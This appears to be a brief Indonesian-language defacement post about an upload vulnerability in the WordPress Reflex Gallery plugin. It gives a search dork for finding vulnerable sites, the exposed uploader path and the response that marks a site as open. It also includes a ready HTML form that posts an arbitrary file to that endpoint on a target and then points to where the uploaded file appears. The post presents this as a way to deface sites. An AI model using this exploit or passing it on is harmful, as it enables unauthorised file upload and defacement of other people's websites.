Wordpress Reflex Gallery Upload Vulnerability

Dork    : inurl:/wp-content/plugins/reflex-gallery/
Exploit : Exploit : wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php
biasanya kalo vuln ada tulisan : {"error":"No files were uploaded."}

script CSRF : <html> <title>Reflex-Gallery CSRF</title> <form method="POST" action="http://contoh-target.com/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php" enctype="multipart/form-data" > <input type="file" name="qqfile"><br> <input type="submit" name="Submit" value="PencetGan!"> </form> </html>

kalo udah coba buka web yang ente deface tadi : http://contoh-target.com/wp-content/uploads/nama file

Tweet